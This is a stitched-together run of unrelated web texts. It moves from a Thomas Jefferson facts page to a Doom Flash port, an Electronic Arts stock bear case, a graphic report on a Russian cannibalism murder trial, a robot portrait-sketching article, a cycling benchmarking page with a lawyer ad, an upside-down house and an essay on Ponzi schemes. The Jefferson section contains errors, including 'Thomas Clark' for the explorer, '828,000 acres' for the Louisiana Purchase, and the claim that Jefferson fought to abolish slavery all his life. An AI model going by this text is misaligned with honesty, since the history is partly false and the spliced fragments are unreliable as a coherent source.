This list of Facts on Thomas Jefferson contains basic things such as birth and death dates , marriage dates , number of children and offices he held .
It also contains some interesting and less well known Facts on Thomas Jefferson .
Facts on Thomas Jefferson
Birthdate
April 13 , 1743
Birthplace
Shadwell , Virginia
Parents ' names
Father - Peter Jefferson , born February 29 , 1708 , died August 17 , 1757
Mother - Jane Randolph , born 1720 , died 1776
Parents ' occupations
Peter Jefferson was a planter and surveyor in Albemarle County , Virginia .
Number of siblings
9
Birth order
3rd of 10 children , two died in childhood
Nicknames
The Sage of Monticello
Man of the People
Father of the University of Virginia
Schools attended
In 1752 at age 9 , Jefferson began attending a local school that was run by a Scottish minister named William Douglas .
He studied Greek , Latin and French .
From 1758 - 1760 , Jefferson attended a school run by minister James Maury in Fredericksville Parish near Gordonsville , Virginia .
He received a classical education and studied history and science .
In 1760 , at age 16 , Jefferson entered the College of William and Mary in Williamsburg , Virginia .
He studied mathematics , philosophy and metaphysics , graduating with highest honors in 1762 .
Jefferson studied law with George Wythe , a future signer of the Declaration of Independence .
Religious Views
Raised an Anglican , in later life Jefferson apparently believed in God and the moral teachings of Jesus Christ and the Bible .
He apparently did not believe , however , that Jesus Christ was divine .
First Occupation
Lawyer , involved with hundreds of cases between 1768 and 1773
Facts on Thomas Jefferson -
Thomas Jefferson Family
Date of marriage , wife 's name
Jefferson married 23 year old widow Martha Wayles Skelton ( October 30 , 1748 - September 6 , 1782 ) on January 1 , 1772 .
They were distant cousins .
Children 's names and birth order
Martha Jefferson Randolph ( also known as Patsy ) , September 27 , 1772 - October 10 , 1836 , named in honor of Martha Washington Jane Randolph , 1774 - 1775 Unnamed son , 1777 Mary Wayles ( also known as Polly ) , 1778 - 1804 Lucy Elizabeth , 1780 - 1781 Elizabeth , 1782 - 1785
( Only Martha and Mary live to adulthood )
Children 's occupations later in life
Martha married cousin Thomas Mann Randolph , Jr. who became Governor of Virginia from 1819 - 1822 .
Children 's occupations later in life
Martha married cousin Thomas Mann Randolph , Jr. who became Governor of Virginia from 1819 - 1822 .
Famous relatives
Jefferson 's mother Jane Randolph was first cousin of Peyton Randolph who became the first President of the Continental Congress .
who became the first President of the Continental Congress .
Jefferson 's father Peter assumed charge of Thomas Mann Randolph when he was an infant , after his father , a relative of Jane 's passed away .
Thomas Mann Randolph later married Thomas Jefferson 's daughter Martha and also became a Governor of Virginia .
Facts on Thomas Jefferson -
The Revolutionary War
How he got involved in the independence effort ?
Jefferson served in the Virginia House of Burgesses beginning in 1769 as a representative from Albemarle County .
In 1774 , the British Parliament passed the Intolerable Acts , which punished Bostonians for the Boston Tea Party .
Colonists all over America were outraged by the acts and Jefferson wrote a set of resolutions condemning the acts .
These resolutions were expanded into Jefferson 's first published work , called " A Summary View of the Rights of British America . "
The document was intended as instructions for Virginia 's delegation to the Continental Congress .
The document was widely distributed and made Jefferson into a widely respected patriot .
Did he see military action during the war ?
No , but he narrowly escaped capture twice during the British invasion of Virginia , including once by Lieutenant Colonel Banastre Tarleton , the notorious villain depicted in Mel Gibson 's , " The Patriot . "
Facts on Thomas Jefferson -
Offices he held
Which party was he in ?
Democrat - Republican ( today 's Democrat party )
Which government offices did he hold ?
Representative to House of Burgesses from Albemarle County - 1769-1776
Delegate to Continental Congress - 1775-1776 and 1783-1784
Appointed Minister to negotiate treaties with Barbary States and various European nations - 1784
Member of Virginia House of Delegates - 1776-1779
Governor of Virginia - 1779-1781
Minister Plenipotentiary to France - 1785-1789
US Secretary of State - September 26 , 1789 - December 31 , 1793
Vice President of the United States - March 4 , 1797 - March 4 , 1801
President of the United States - March 4 , 1801 - March 4 , 1809
Did he hold any office under the Royal government ?
No
Significant accomplishments while in office ?
Wrote the Declaration of Independence - 1776
Signed Declaration of Independence - 1776
Directed the Louisiana Purchase , which purchased much of the land west of the Mississippi from France in 1803 .
828,000 acres was purchased from Napoleon Bonaparte and France for $ 233 million dollars in today 's money .
That 's only 42 cents an acre !
Louisiana Purchase ( The area in green )
Sent Meriwether Lewis and Thomas Clark on their famous expedition to explore the Western United States - 1804 -1806 .
Lewis was an aide to President Jefferson .
Facts on Thomas Jefferson -
Other Personal Info
Selected Thomas Jefferson writings and their dates
Thomas Jefferson Quotes
" The God who gave us life , gave us liberty at the same time . " - From " A Summary View of the Rights of British America " - 1774
" All persons shall have full and free liberty of religious opinion ; nor shall any be compelled to frequent or maintain any religious institution . "
- From Jefferson 's draft Constitution for the State of Virginia - June 1776
" I have sworn upon the altar of god eternal hostility against every form of tyranny over the mind of man . " - Letter to Benjamin Rush , September 23 , 1800
" He who permits himself to tell a lie once , finds it much easier to do it a second and third time , till at length it becomes habitual ; he tells lies without attending to it , and truths without the world 's believing him .
This falsehood of tongue leads to that of the heart , and in time depraves all its good dispositions . "
- Letter to Peter Carr , his nephew , August 19 , 1785
Find more Thomas Jefferson Quotes here .
Character and disposition
Jefferson often greeted people at the White House in a robe and slippers !
He also made formal White House dinners more casual affairs .
These things earned him the nickname , " Man of the People . "
Jefferson had a great intellect , learned several languages , played instruments and was an inventor and architect .
He was often considered a very private man - he burned all the letters between himself and his wife after her death .
Jefferson was a terrible money manager and was heavily in debt most of his life , including at his death .
Facts on Thomas Jefferson -
The end of his life
Date and age of retirement
Jefferson left public office for the last time in 1809 , but continued to be President of the American Philosophical Society until 1815 .
He designed and oversaw the building of the University of Virginia from roughly 1819 - 1825 .
Date of death
July 4th , 1826 , the 50th anniversary of the Declaration of Independence , at age 83 .
This is the same day that Jefferson 's one time rival , former President John Adams died .
They were bitter enemies for years , but reconciled in later years .
Jefferson died only a few hours before Adams .
Location of grave
Monticello , Jefferson 's estate near Charlottesville , Virginia
Epitaph on gravestone
This epitaph was written by Jefferson himself .
He insisted that not a word be changed :
HERE WAS BURIED THOMAS JEFFERSON
AUTHOR OF THE DECLARATION OF AMERICAN INDEPENDENCE
OF THE STATUTE OF VIRGINIA FOR RELIGIOUS FREEDOM
AND FATHER OF THE UNIVERSITY OF VIRGINIA
BORN APRIL 2 1743 O.S .
DIED JULY 4 1826
The O.S. in the birthdate stands for " Old Style , " referring to the old Julian calendar used in English nations at the time of Jefferson 's birth .
The calendar was changed to the Gregorian calendar in 1752 , adding about two weeks to the calendar to compensate for inaccuracies in the Julian calendar .
Other interesting
Facts on Thomas Jefferson
Landmarks for Thomas Jefferson
Jefferson Memorial - Washington DC , dedicated on April 13 , 1943 , the 200th anniversary of Jefferson 's birth .
The most prominent inscription , in his own words , reads : " I have sworn upon the altar of God eternal hostility against every form of tyranny over the mind of man . "
Mount Rushmore - Near Keystone , South Dakota , features the heads of Washington , Roosevelt , Lincoln and Jefferson carved into the side of a mountain .
Mount Rushmore
Monticello - Jefferson 's famous home near Charlottesville , Virginia .
The home was designed by Jefferson himself .
You can visit the Monticello website here .
Other interesting Facts on Thomas Jefferson
One of the primary founders of the University of Virginia in 1819 .
Jefferson designed the original architecture and curriculum himself .
While in the Virginia legislature , Thomas Jefferson introduced a bill to outlaw the death penalty for all crimes except murder and treason .
The bill failed by one vote .
Jefferson spearheaded the hiring of George Wythe as the first professor of law at an American university at the College of William and Mary .
as the first professor of law at an American university at the College of William and Mary .
Jefferson was six feet tall and had red hair .
Jefferson was President of the American Philosophical Society from 1797 - 1815 .
Jefferson sold his personal library of 6,487 books to the Federal government in 1815 to help restart the Library of Congress , which had been burned during the British invasion of Washington DC during the War of 1812 .
Jefferson was a slaveholder all his life .
He received a large number of slaves at the age of 14 , but was never legally allowed to release his own slaves .
He fought vigorously at the state and national level to abolish slavery his whole life .
Thomas Jefferson 's likeness is featured on the United States $ 2 bill and the United States 5 cent nickel .
You may like to check out these other pages about Thomas Jefferson : Learn about how Thomas Jefferson wrote the Declaration of Independence here .
Read Thomas Jefferson Quotes here .
If you liked these Thomas Jefferson Facts , you will also like to read the following Revolutionary War Facts :
Return to top of Facts on Thomas Jefferson
Revolutionary War Facts
Revolutionary War and Beyond Home
Like This Page ?
Formatting may be lacking as a result .
If this article is un-readable please report it so that we may fix it .
Posted on November 26 , 2008 , Jonathan Doom Gets Ported to Flash for Your In - Browser FPS Needs
The original Doom has been ported just about everywhere by now .
It can be downloaded through Xbox Live , it can be played on your DS with a mod , and it can even be played as in RPG - form on your cell phone .
Well now , the classic FPS has shown up in yet another placed : your web browser .
One programmer on NewGrounds has now recreated the entire first episode of the series in Flash 10 .
It may not have music , and the controls are a little different , but now you can blast through the legions of Hell on almost any computer .
You can check out the Flash version of Doom for yourself here .
The recent run-up in the market would make it easy to justify selling any stock these days .
Yet while panic never helps investors , it 's still a good idea to play devil 's advocate with our potential investments .
Consider video game developer Electronic Arts ( Nasdaq : ERTS ) .
Though the gaming sector holds immense potential , at least a few of the 2,205 Motley Fool CAPS members who 've weighed in on the company offer reasons to be bearish .
Here at The Motley Fool , we like to consider both the good and bad sides of an investment .
Thus , I 'm highlighting three of the main bearish arguments on Electronic Arts today .
Be sure to read the bullish side as well , then weigh in with your own comments below , or rate Electronic Arts in CAPS .
1. Further weakness
Although Activision Blizzard ( Nasdaq : ATVI ) recently lifted its outlook , and GameStop ( NYSE : GME ) highlighted strength in used games , the good news is n't widespread .
Electronic
Arts disappointed investors when it announced expectations of weak packaged - goods game sales this year .
With a lack of conviction in a turnaround , some investors are still hedging on the gaming sector .
2. Difficult shift
Shanda Games ( Nasdaq : GAME ) was quick to capitalize on the trend of increasing casual online gamers in the U.S. by buying Mochi Media .
Electronic
Arts is trying to shift toward casual games , too .
It 's growing its presence on Apple 's multiple mobile devices and platforms like Facebook , among other strategies .
But with a string of quarterly losses , some investors are growing impatient , suspecting that EA may have missed this boat .
3. Getting outplayed
Shares of Electronic
Arts have underperformed higher - rated , four - star gaming peers such as Activision Blizzard and Grand Theft Auto - fueled Take - Two Interactive ( Nasdaq : TTWO ) over the past year .
Even Chinese online gaming company NetEase.com ( Nasdaq : NTES ) has put on a stronger showing , thanks to World of Warcraft and its focus on the growing Chinese market .
Shares of EA have improved in recent months , but some investors still see better opportunities elsewhere .
For details on what CAPS members are saying now about Electronic Arts , just click on over to Motley Fool CAPS and have a look -- or add your own thoughts directly to this story in the comments box below .
THE trial of two Russian men accused of chopping up a 16 - year - old girl and eating her with potatoes has been postponed after a juror fell ill looking at prosecution images .
The case was postponed after the juror had to be excused while examining photographs of student Karina Barduchian after her death , the Daily Mail reports .
Maxim Golovatskikh and his friend florist Yury Mozhnov , both 20 , are accused of drowning Karina Barduchian in a bath and then carving up her body and serving her meat with potatoes to a lodger .
Before the case was stopped , the lodger , Ekaterina Zinovyeva , told the court in St Petersburg they had a party with their Goth friends on the night of the murder in January , 2009 .
Karina , who was in love with Mr Golovatskikh , stayed the night , she said .
" Maxim and Karina went to the bathroom together and I went to bed , " she told the court .
" I was sleepy but heard splashes of water and some noise there but was not worried .
Sometime later I woke up and decided to check what was going on .
" I went to the bathroom but Yury stopped me on the way and told me to go back to bed .
" They had joked earlier that they could kill Karina but , of course , I could n't believe for a second that they were serious . "
Next day when she got home from work , Mr Golovatskikh and Mr Mozhnov offered Ekaterina meat and potatoes .
She allegedly ate it not knowing where it was from .
The men later hid the rest of Karina 's remains in garbage skips , it is alleged .
" They cut up the body of the victim into several pieces , eating some of them and throwing the others into the bin , " prosecutor Andrei Lavrenko said .
" They cooked her meat and served up the meal with potatoes .
" They were interrogated and explained the murder by saying they were desperate to eat . "
The deputy head of St Petersburg criminal investigations Sergei Strelin said : " They confessed their guilt straight away .
They explained they were hungry and drunk . "
The victim had defied her mother in continuing to see Mr Golovatskikh , who was also the lead singer in a minor pop group in St Petersburg .
Her mother Nadya , 45 , said : " Our lives are ruined by Karina 's death and the horrible way she died . "
The two accused are due to give evidence when the case resumes this week .
See pictures of accused cannibals Maxim Golovatskikh and florist Yury Mozhnov at the Daily Mail .
MORE CARTOONS :
Security Check
2009.12.29
Slideshow : The Decade in Cartoons
2009.12.22
Security Update
2009.12.02
Escalation in Afghanistan
2009.09.24
The Age of Non-Innocence
2009.08.25
The New Colossus
2009.08.04
Iran-I-am
2009.06.19
Hudson Hero
2009.01.16
See the complete Sage , Ink index .
We want to hear what you think about this article .
Submit a letter to the editor or write to letters@theatlantic.com .
By Mark Ward
Technology correspondent , BBC News
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement
Art is a problem .
Not in the sense that it is a waste of money , often unfathomable and occasionally obscene .
It is a problem because of all the things people do it is the activity that cannot be easily explained by consulting their biological urges .
It stands out as a uniquely human activity .
No other animal goes to such lengths to produce it , consume it and react to it in the way that people do .
That 's why it is a problem .
And a tricky one at that .
Patrick Tresset and Frederic Fol Leymarie are trying to shed light on it using a system called Aikon that aims to unpick and then copy how an artist works .
The artist is Mr Tresset who has almost a decade of practice as a portrait artist to call on .
" We 're trying to understand what goes on in the mind of the person performing the act of drawing , " said Prof Leymarie .
That understanding , gleaned from watching Mr Tresset at work and drawing on his own insights of how he works , has produced a system that uses a robot arm to sketch faces .
The robot arm is crude but can produce works of art At no point , said Prof Leymarie , was the idea to create photo - realistic reproductions of faces .
Instead the roughness of the finished sketches is key .
" It 's a cheap robot arm because we are trying to get away from something that 's a performance and very well engineered , " he said " In part that 's because we are trying to capture the different elements and uncertainties that are expected from a human . "
One key insight that developing the system has revealed is the difference in the amount of time that artists and non-artists spend looking at a subject when they are drawing .
Non-artists , said Prof Leymarie , spend their time looking at the paper .
By contrast , he said , artists look at the subject and trust their hand to do the reproduction .
The collaboration between Mr Tresset and technology has been such that now the robot arm can produce sketches in its own distinctive style .
And , said Prof Leymarie , the collaboration does not end there .
" He can not only use it as a way to explore and understand what he is doing or what other artists are doing , " he said .
" He can use it as something more powerful .
" It can be used by artists to explore why they end up doing a certain type of art a certain way , " he said .
Novel art Mr Tresset and Prof Leymarie are not alone in using technology to tickle the creativity of artists and others .
At a Digital Expo to show off Goldsmiths College 's digital studio , Dan Jones created an installation that helped visitors explore interactive creativity .
It bonded motion capture to a virtual landscape .
As a participant moved around the enclosed space , clapped their hands or spoke , the landscape was changed in response .
Mr Jones said the installation was related to the work he is doing to help scientists and artists explore all facets of their creativity .
Dan Jones ' installation lets people interact with a virtual landscape
In a similar way , he said , the creative journey that artists embark on when producing a work is really only one path through the larger landscape of all the things they could create .
" Through a lifetime of practice artists acquire habits and tropes , " said Mr Jones .
" One way out of that is adopting computational models that supplement their own creative process that can re-shape and re-direct that impulse . "
Simulations based around small , smart software programs known as agents can help artists reach those areas of that creative landscape that they would otherwise never visit .
One product of this work is a system that can improvise and jam with musicians .
" What 's particularly interesting about it is that it 's inherently unpredictable and chaotic , " he said .
Often it takes musicians to places they have never been before and stretches their ability to improvise , to create .
Mr Jones work is also being applied to the sciences to help a group of researchers tackling leukaemia to understand how stem cells react to the disease .
The interaction of visualisation and their deep knowledge of the biology could give them a far greater insight into how that system works .
Dr Mick Grierson , who oversees the work going on at Goldsmiths , said the projects go to the heart of what it means to be a maker , hacker , scientist or artist .
And arguably a human .
It is all about curiosity , creativity and innovation .
" That 's what makes science great , and technology great and art great , " he said " It 's about playing with ideas .
" You try a few things out and see what happens , then try more and more and you come up with something that is genius , " he said .
Only by building it , seeing and shaping it , can they truly understand .
Something any and every maker can identify with .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Benchmarking
Alliance Bicycling and Walking Benchmarking Project
The U.S. Bicycling and Walking Benchmarking Project is an on - going effort from the Alliance for Biking & Walking to collect and analyze data on bicycling and walking in all 50 states and at least the 50 most - populated U.S. cities .
The first report was published in August 2007 , the second in January 2010 and the third in January 2012 .
The next will be released in 2014 .
Did you know that bicyclists are injured daily while on the road ?
The most common cause of cyclist injury or death is negligent car drivers on the road .
Leading the way in bicycle injuries are California and Florida .
If you ’ve suffered a bicycle injury due to a negligent driver in Southern Florida , speak with personal injury lawyer in Miami before accepting a settlement .
Visit laventlaw.com for more information .
Read More …
2012 Benchmarking Report
( 242 pages , 24 MB ) About the 2012 Report : Bicycling and Walking in the U.S. : 2012 Benchmarking Report is an essential resource and tool for government officials , advocates , and those working to promote bicycling and walking .
The Benchmarking Project is an on - going effort by the Alliance for Biking & Walking to collect and analyze data on bicycling and walking in all 50 states and the 51 largest U.S. cities .
This third biennial report reveals data including : bicycling and walking levels and demographics ; bicycle and pedestrian safety ; funding for bicycle and pedestrian projects ; written policies on bicycling and walking ; bicycle infrastructure ; bike - transit integration ; bicycling and walking education and encouragement activities ; public health indicators ; and the economic impact of bicycling and walking .
The report is full of data tables and graphs that show how your state or city stacks up and provides unprecedented statistics to help support your case for increasing safe bicycling and walking in your community .
Bicycling and Walking in the U.S. : 2012 Benchmarking Report was funded by the Centers for Disease Control and Prevention and made possible through the additional support of AARP , http://www.planetbike.com/Planet Bike , and Lavent Law .
Read More …
Share :
2012 Benchmarking Media Hits
The 2010 Benchmarking Report was cited in more than 300 articles in a wide variety of media across North America .
Read stories about and references to the 2012 Benchmarking Report here .
Read More …
Share :
2010 Benchmarking Report : Information & Findings
( 192 pages , 14.2 MB ) About the 2010 Report : Bicycling and Walking in the U.S. : 2010 Benchmarking Report is an essential resource and tool for government officials , advocates , and those working to promote bicycling and walking .
The Benchmarking Project is an on - going effort to collect and analyze data on bicycling and walking in all 50 states and the 51 largest U.S. cities .
This second biennial report reveals data including : bicycling and walking levels and demographics ; bicycle and pedestrian safety ; bicycle and pedestrian policies and provisions ; funding for bicycle and pedestrian projects ; bicycle and pedestrian staffing levels ; written policies on bicycling and walking ; bicycle infrastructure including bike lanes , paths , signed bike routes , and bicycle parking ; bike - transit integration including presence of bike racks on buses , bike parking at transit stops ; bicycling and walking education and encouragement activities ; and public health indicators including levels of obesity , physical activity , diabetes , and high blood pressure .
The report is full of data tables and graphs so you can see how your state or city stacks up .
Inside you will find unprecedented statistics to help support your case for increasing safe bicycling and walking in your community .
Bicycling and Walking in the U.S. : 2010 Benchmarking Report was funded by the Centers for Disease Control and Prevention and made possible through the additional support of Bikes Belong and Planet Bike .
Read More …
Share :
2007 Benchmarking Report : Information & Findings
( 120 pages , 52 MB )
About the 2007 Report :
This first biennial report , released August 29 , 2007 , reveals data on bicycling and walking throughout the U.S. including : bicycling and walking levels and demographics ; bicycle and pedestrian fatalities ; bicycle and pedestrian policies and provisions ; funding for bicycle and pedestrian projects ; bicycle and pedestrian staffing levels ; written policies on bicycling and walking ; bicycle infrastructure including bike lanes , paths , signed bike routes , and bicycle parking ; bike - transit integration including presence of bike racks on buses , bike parking at transit stops , and hours per week that bicycles are allowed on train ; and public health indicators including levels of obesity , physical activity , diabetes , and high blood pressure .
The report is full of data tables and graphs so you can see how your state or cities stack up .
Inside you will find unprecedented statistics to help support your case for increasing safe bicycling and walking in your community .
Download the complete report ( 52.6 MB ) [ PDF Document ]
A BIZARRE upside - down house in Germany is set to open its doors to tourists for the first time .
In pictures : Upside - down house
Built inside the grounds of a zoo in Getorff , Germany , the house has an upside - down kitchen , bathroom , living room and bedroom .
The 23 ft - tall ( seven metres ) home was built by carpenter Gerhard Mordhorst and his colleagues Gesellse Splettstober and Manfred Kolax .
They described the project as one of the “ craziest ” they ’ve ever been asked to do .
Steel plates and screws were used to hold the furniture in place .
Putting the bathroom together was the trickiest part due to bulky items such as the shower .
The men went to great length to make sure every detail was perfect , even using needle and thread in order to keep the bed linen in place .
The house was built on an incline to further challenge the viewer ’s perpective .
The “ crazy house ” , which was thought up by Hamburg investor Dirk Oster , will open to the paying public at the end of March .
In pictures : Upside - down house
In - depth :
All the latest travel news
Follow our Twitter blog
Follow our travel reporter and travel editor 's Twitter blog
For indispensable reporting on the coronavirus crisis , the election , and more , subscribe to the Mother Jones Daily newsletter .
This story first appeared on the TomDispatch website .
Every great American boom and bust makes and breaks its share of crooks .
The past decade — call it the Ponzi Era — has been no different , except for the gargantuan scale of white - collar crime .
A vast wave of financial fraud swelled in the first years of the new century .
Then , in 2008 , with the subprime mortgage collapse , it crashed on the shore as a full - scale global economic meltdown .
As that wave receded , it left hundreds of Ponzi and pyramid schemes , as well as other get - rich - quick rackets that helped fuel our recent economic frenzy , flopping on the beach .
The high - water marks from that crime wave , those places where the corruption reached its zenith , are still visible today , like the 17th floor of 885 Third Avenue in midtown Manhattan , the nerve center of investment firm Bernard L. Madoff Investment Securities — and , as it turned out , a $ 65 billion Ponzi scheme , the largest in history .
Or Stanfordville , a sprawling compound on the Caribbean island of Antigua named for its wealthy owner , a garrulous Texan named Allen Stanford who built it with funds from his own $ 8 billion Ponzi scheme .
Or the bizarrely fortified law office — security cards , surveillance cameras , hidden microphones , a private elevator — of Florida attorney Scott Rothstein , who duped friends and investors out of $ 1.2 billion .
The more typical marks of the Ponzi Era , though , are n’t as easy to see .
Williamston , Michigan , for instance , lacks towering skyscrapers , Italian sports cars , million - dollar mansions , and massive security systems .
A quiet town 15 miles from Lansing , the state capital , Williamston is little more than a cross - hatching of a dozen or so streets .
A “ DOLLAR TIME $ ” store sits near Williamston ’s main intersection — locals affectionally call it the “ four corners ” — and its main drag is lined with worn brick buildings passed on from one business to the next like fading , hand - me - down jeans .
It ’s here , far from New York or Antigua , that thanks to two brothers seized by a financial fever dream , the Ponzi Era made its truest , deepest American mark .
Jay and Eric Merkle , active church members and successful local businessmen , were well known among Williamston ’s residents .
In 2004 , the brothers discovered that an oil - and - gas venture , which they had invested in and which promised them quick , lucrative returns , was a scam .
They ’d been duped .
Their next move should have been simple : turn in the crooks and get on with their lives , their pockets a few dollars lighter .
Jay and Eric , however , grasped the spirit of their age and made another decision entirely — they teamed up with the guys who had ripped them off , in the process switching from prey to predator .
That first venture actually floundered , but in 2005 , court records show , they started their own Ponzi scheme , Platinum Business Industries ( PBI ) .
Based in Williamston , PBI claimed it was socking its investors ’ money into lucrative oil and gas exploration opportunities in Oklahoma and Texas , and it promised the investors absurdly high returns — 6 % a month , or 72 % a year .
Despite such promises , the brothers assured town locals handing over their hard - earned dollars that little risk was involved .
Even if the energy exploration did n’t pay off , the land acquired by PBI was valuable and could be sold to offset any losses .
Like Madoff in Palm Beach , the Merkles in Williamston exploited local ties — church and family — to reel in new investors ; and like Madoff ’s investment fund , PBI , too , was a complete sham , and a classic Ponzi scheme — that is , an investment scam in which existing investors ’ returns are paid for with money from new investors .
In the case of PBI , there was no energy exploration in Oklahoma and Texas .
Some of the money they received from later investors the Merkles used to pay off earlier ones and give their scheme the look of success .
But in their case , there was a rub .
The Merkles were distinctly creatures of the Ponzi Era : they evidently could n’t help themselves .
Even as they ran their own Ponzi racket , documents show , they were getting fleeced .
What they were n’t paying out in fake returns the Merkles bet on high - yield , get - rich - quick schemes in the US and abroad that had nothing to do with oil and gas — and other Ponzi schemers and con artists were robbing them blind .
Their financial crime spree collapsed in 2008 .
Dead - broke , with investigators closing in , they told investors that various foreign governments and banks had frozen their assets .
The brothers then asked them to wire more than a million dollars to Nigeria , Ghana , and other countries as “ fees ” to release their money , even as they warned them against cooperating with an FBI investigation .
Then , on a brisk autumn day in October 2008 , the feds arrested to the two brothers ; the game was up .
In all , via PBI and other scams , they had duped more than 600 investors out of $ 50 million , robbing some of their life savings .
When compared to Madoff ’s or Stanford ’s heists , that sum was little more than pocket change .
But the Merkle brothers caught the true , democratic spirit of a decade of an unrestrained magical thinking that infected rich and poor , successful and ne’er - do - well , the financially savvy and neophytes who could n’t tell a stock from a bond .
Think of their story as a parable for the Ponzi Era : they were taken , decided to become takers , took others , then got taken again .
In the rush for the pot of gold at rainbow ’s end , they bet everything Main Street had to offer , believing they could get away with it .
Thanks to an open credit spigot , a booming housing market , and visions of unimaginable wealth on Wall Street , practically everyone in the United States in the past decade seemed to aspire to get rich — and quick .
Perfectly ordinary people refinanced their homes , refinanced again , and used the money they got to stake themselves at the crooked casino table of American life .
Some rolled the dice in stocks , bonds , and second homes .
For millions more , the gamble took the form of “ investment opportunities ” that promised wealth in a hurry , opportunities now exposed as little more than financial con jobs .
“ People were shooting for that home run , ” says Peter Henning , a law professor at Wayne State University and white - collar crime expert .
“ They were saying , ‘ I ’m just as smart as Warren Buffet . ' ”
Today , with easy credit and the buy - now - pay - tomorrow culture that it spawned in the dustbin of history , the Ponzis and pyramid schemes of the past decade can be seen for what they really were .
Not a week seems to go by without the Securities and Exchange Commission ( SEC ) or the FBI or law enforcement officials busting another get - rich hustle .
Yet the full scope of the criminality of the Ponzi Era remains elusive ; no one yet knows just how widespread those Ponzi schemes were — and how many may remain , hidden or in plain sight .
Beyond the headliners like Madoff and Stanford , Americans may not actually be aware of just how many schemes of this sort were abroad in our land — but it probably does n’t matter much either .
Disillusionment with the past decade is such that many Americans now simply assume that our world is little but a giant Ponzi scheme .
Ponzis , Ponzis , Everywhere
The wave of financial crime may have peaked in 2005 or 2006 , but the detritus of such collapsed schemes has left regulators and investigators ever busier .
Almost four times as many Ponzi schemes broke down in 2009 — 150 — as in 2008 — 40 .
According to the Associated Press , the FBI began more than 2,100 securities fraud cases last year , an increase from 1,750 the year before .
The SEC likewise dealt out 82 % more restraining orders against Ponzi schemes and similar frauds in 2009 than the previous year .
2008 belonged to Madoff , but 2009 and 2010 have displayed a far more eclectic cast of crooks .
We learned of mini Madoff , Miami Madoff , and Montreal Madoff , of Ponzis targeting African Americans , Haitian Americans , and Cuban Americans .
There were fraudulent real - estate schemes and farm - grain schemes .
Some were banal , like a Ponzi built on investments in state - worker uniforms or one that siphoned off retirement funds from bus drivers .
Others were sexier , like the high - profile Florida race - car driver who , investigators say , swindled investors for $ 5 million claiming to peddle iron - ore contracts , or the clutch of professional athletes , among them the National Football League ’s Michael Vick , allegedly fleeced for $ 3 million by an elite “ adviser ” offering guidance on buying luxury properties and private jets .
There were Ponzis piled atop each other , like a recent Detroit scam described by a state official as “ a multiheaded Ponzi hydra . ”
Faltering Ponzis have spread woe in Dallas and Boca Raton , Livermore and Long Island , Seattle and Atlanta .
And the legacy of the past decade ’s procession of white - collar criminals has indelibly marked our society in ways that go far beyond the financial losses they caused to their unfortunate investors .
Just use the word “ Madoff ” and see if you do n’t inspire a visceral sense of revulsion in your listeners .
( So notorious is the name that Bernie ’s daughter - in - law wants to legally change her daughter ’s last name from Madoff to Morgan to avoid “ additional humiliation . ” )
Indeed , the Ponzi scheme is now so imprinted on the American imagination that it has , to some extent , become a prism through which we interpret the world .
The World ’s a Ponzi , and We ’re All Getting Duped
A decade ago , few Americans would have described the world around them in Ponzi terms , if they even knew what it was .
Today , it ’s become increasingly commonplace to describe American politics as a series of massive , plain - as - day Ponzi schemes .
Medicare , for instance , or Social Security are regularly deemed Ponzis by right - wing protestors railing against the spread of big government .
“ It ’s become part of the political nomenclature , ” says law professor Henning .
“ That may be the greatest effect Madoff had .
He ’s now taken a term of art and made it into common public discourse . ”
Last month , for instance , Tim Pawlenty , the drawling Minnesota governor and potential Republican presidential candidate , described not just Social Security and Medicare but all federal government spending as the “ Ponzi scheme on the Potomac . ”
That scheme , Pawlenty wrote , “ sooner or later ” will
“ come crashing down , and the loss will be mammoth …
Ponzi schemes succeed because people want to believe in a free lunch as long as the easy money is rolling in .
But a day of reckoning always arrives , and ours is right around the corner .
The sooner we open our eyes , the sooner we can clean up this mess . ”
The inexorable rise of our closest economic competitor , China , is apparently a massive Ponzi , too .
According to some journalists and analysts , that country ’s success has been built on a bloated stock market , a growing housing bubble , cheap labor , and the promise of increasing returns .
If so , it ’s undoubtedly the greatest heist ever pulled in plain sight , involving the duping of China ’s billion - plus inhabitants and the billions more worldwide whose lifestyles would n’t exist without the Middle Kingdom ’s industrial rise .
To some , the Ponzi scheme knows no borders at all .
Joe Romm , a climate science expert and blogger at ClimateProgress.org — a left - leaning website , since the Ponzi mindset is bipartisan — casts our current climate nightmare as a global Ponzi .
By devouring natural resources now and cavalierly spewing greenhouse gases to poison the planet ’s future , Romm says , we ’re mortgaging the lives of future generations :
“ You can get this burst of wealth that we have created from this rapacious behavior .
But it has to collapse , unless adults stand up and say , ‘ This is a Ponzi scheme .
We have not generated real wealth , and we are destroying a livable climate … ' ”
What does it mean that we so eagerly slap the label “ Ponzi scheme ” on those things that most frustrate , infuriate , or confound us ?
Why do so many Americans feel like hapless investors who have thrown away their life savings to pay off guys at the top whose only goal is to screw over everybody else ?
It ’s an unmistakable sign , at the very least , of a deep , simmering distrust and disillusionment , a dark undercurrent of despair spreading through our culture , whether voiced by Governor Pawlenty or a newspaper reader in rural Ohio who wrote in a letter to the editor that Social Security “ is , by definition , a Ponzi scheme . ”
Today , for Americans , the literal Ponzi schemers may be the least of it .
Sooner or later , they usually go to jail .
But the distrust they sparked has made its way to the very kings of finance , who , like the Ponzi - schemers , were not so long ago going to make us all rich , who struck the match and then stoked the flames of the financial crisis , who created oblique financial products like collateralized debt obligations and pick - a- pay subprime mortgages , and then walked away unscathed with multi-million dollar salaries and bonuses in their pockets .
The distrust extends as well to the government that finally jailed Madoff and is prosecuting Stanford , but has dealt a free pass to Lloyd Blankfein of Goldman Sachs and Dick Fuld of Lehman Brothers .
What might be thought of as an American Ponzi mood can be seen in the rise of anti-government groups like the burgeoning Tea Party movement .
The scattered “ patriot ” groups that comprise the Tea Partiers passionately claim the president , the Democrats , and even the Republicans are “ stealing ” their country and liberty from them ; in some cases , they are prepared to take up arms against what they see as fraud of the largest order , which they term “ socialist tyranny . ”
Most disquieting in the Ponzi Era is the disillusionment it has bred , the sense that people you know or work with could be ripping you off .
In Bernie Madoff ’s case , there ’s a possibility he deceived his own wife and children .
The Merkle brothers exploited members of their church and extended family .
“ You work hard your whole life to be smart with your money and save and then it is taken by someone you know , ” said a resident of tiny Van Wert , Ohio , who ’d been duped by the Merkles .
“ People need to be warned that it can happen in Van Wert , too . ”
How long it will take for that embedded distrust to dissipate is anyone ’s guess .
